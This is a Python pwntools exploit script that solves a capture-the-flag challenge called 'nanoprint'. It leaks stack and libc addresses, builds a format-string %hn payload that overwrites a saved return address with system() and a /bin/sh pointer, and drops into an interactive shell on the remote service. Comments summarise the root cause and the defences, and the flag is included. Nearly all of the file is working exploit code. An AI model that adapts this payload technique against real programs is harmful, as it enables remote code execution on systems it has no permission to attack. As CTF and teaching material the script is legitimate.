dorsia3.py
from pwn import *
# context.log_level = "DEBUG"
#
# Exploit script for the "nanoprint" challenge: a format-string write.
# The target apparently passes attacker-controlled input to printf() as the
# format string, so `%N$hn` conversions write 16-bit values to addresses
# embedded in the same buffer.  Defender's summary of what makes this class
# of bug exploitable and how it is closed:
#   - root cause: a non-literal format string (`printf(buf)` instead of
#     `printf("%s", buf)`);
#   - compile-time detection: -Wformat -Wformat-security (-Werror=format-security);
#   - runtime hardening: _FORTIFY_SOURCE=2 rejects %n from a writable format
#     string; full RELRO and PIE/ASLR are why this script needs two leaked
#     addresses (a stack address and a libc address) before it can do anything;
#   - detection: a request/line containing `%…$n`/`%…$hn` sequences is a
#     high-signal indicator of a format-string probe.
#
# Flag switches: LOCAL selects a local process vs the remote service,
# DEBUG attaches gdb and pauses before sending the payload.
LOCAL = False
DEBUG = False
# 32-bit target: addresses are 4 bytes, which is why the leak below is parsed
# as "0x" + 8 hex digits and the writes are split into two 16-bit halves.
context.update(arch='i386', os='linux')
e = ELF("./nanoprint")
# NOTE(review): `l` is loaded but never used in this script (only e.path is
# read); the libc offsets below are hard-coded instead.  `l` also shadows a
# hard-to-read single-letter name.
l = ELF("./libc.so.6")
if LOCAL:
    p = process(e.path)
else:
    host = "dorsia3.wpictf.xyz"
    port = 31339
    p = remote(host, port)
if DEBUG:
    context.terminal = ['tmux', 'splitw', '-h']
    # Breakpoint before the second printf() — the call that consumes the
    # format-string payload.  Address is specific to this binary/load address.
    gdb.attach(p, "b *0x565560c7") # before second printf() "b *0x565560c7"
    # ret: 0x565560d9
# The first line the program prints carries the leaks.  recvuntil() returns
# bytes; int() accepts bytes for a base-16 parse, so no decode is needed.
leak = p.recvuntil("\n", drop=True)
# First 10 characters ("0x" + 8 hex digits): address of the stack array a[].
leak_a = int(leak[:10], 16)
# Remainder of the line: a libc address; +288 rebases it to system().
# The 288 (and the /bin/sh offsets below) are constants for the libc build
# shipped with the challenge and cannot be verified from this file.
leak_system = int(leak[10:], 16) + 288
if LOCAL:
    leak_binsh = leak_system + 1305535
else:
    # /bin/sh: 0x17e0cf
    leak_binsh = leak_system + 0x140ecf
log.critical("addr of a[]: {0}".format(hex(leak_a)))
log.critical("addr of system(): {0}".format(hex(leak_system)))
log.critical("addr of str_bin_sh: {0}".format(hex(leak_binsh)))
# Stack layout notes recorded by the author (low byte of each address):
# esp before calling second printf: 0x*a0
# a[]: 0x*bb
# return address is at: 0x*12c
# example payload: aaaaa%9$nAAAABBBBCCCCDDDD, this write 0x5 to 0x41414141
# example legitimate return address: 0xf7dffe81
# how to change this value to 0xf7e23d10?
#
# The saved return address is a fixed distance (0x12c - 0xbb) above a[], so
# the leaked a[] address pins it even under ASLR.
ret_addr = leak_a + (0x12c - 0xbb)
log.critical("return addr should be at: {0}".format(hex(ret_addr)))
log.critical("bin_sh should be at: {0}".format(hex(ret_addr + 8)))
# Split each 32-bit target value into two 16-bit halves; each half is
# written with a separate `%hn`.
s1 = leak_system & 0xffff
s2 = (leak_system >> 16) & 0xffff
b1 = leak_binsh & 0xffff
b2 = (leak_binsh >> 16) & 0xffff
# (value, address) pairs: system() over the return address, the /bin/sh
# pointer 8 bytes above it (ret_addr + 4 is left as system()'s own return slot).
q = list()
q.append((s1, ret_addr))
q.append((s2, ret_addr + 2))
q.append((b1, ret_addr + 8))
q.append((b2, ret_addr + 10))
# %n writes the running character count, which only grows, so the writes
# must be issued in increasing order of value.
q.sort()
for i in range(len(q)):
    if i != (len(q) - 1):
        # Each successive value must exceed the previous one by at least 4.
        # NOTE(review): the rationale for the constant 4 is not recorded —
        # presumably the minimum padding a `%Nc` conversion can add here;
        # confirm before reusing.  Also, `assert` is stripped under `python -O`.
        assert(q[i+1][0] - q[i][0] >= 4)
    success("write {0} to {1}".format(hex(q[i][0]), hex(q[i][1])))
# Payload layout: 1 byte of padding, then the four target addresses, then the
# format conversions that reference them.
payload = b'a'
payload += p32(q[0][1])
payload += p32(q[1][1])
payload += p32(q[2][1])
payload += p32(q[3][1])
# `num` tracks how many characters printf will have emitted so far; each
# `%Nc` below pads output up to the next value to be written.
num = len(payload)
success("length of payload so far: {0}".format(num))
# Positional argument indices that line up with the four p32() addresses at
# the start of the payload.  These depend on the target's frame layout
# (see the esp / a[] notes above) — TODO confirm if the binary changes.
a1 = 7
a2 = 8
a3 = 9
a4 = 10
# For each write: pad output to the desired value with `%<delta>c`, then
# `%<idx>$hn` stores the low 16 bits of the count at the idx-th address.
payload += b'%' + str(q[0][0] - num).encode() + b'c'
payload += b'%' + str(a1).encode() + b'$hn'
num = q[0][0]
payload += b'%' + str(q[1][0] - num).encode() + b'c'
payload += b'%' + str(a2).encode() + b'$hn'
num = q[1][0]
payload += b'%' + str(q[2][0] - num).encode() + b'c'
payload += b'%' + str(a3).encode() + b'$hn'
num = q[2][0]
payload += b'%' + str(q[3][0] - num).encode() + b'c'
payload += b'%' + str(a4).encode() + b'$hn'
success(payload)
success("length of entire payload: {0}".format(len(payload)))
# Input length limit — presumably the size of the target's read buffer;
# as above, this `assert` disappears under `python -O`.
assert(len(payload) < 69)
if DEBUG:
    print("R U ready?")
    input()
p.sendline(payload)
#p.recvline()
p.interactive()
# WPI{Th3re_is_an_idea_of_4_Pa7rick_BatemaN}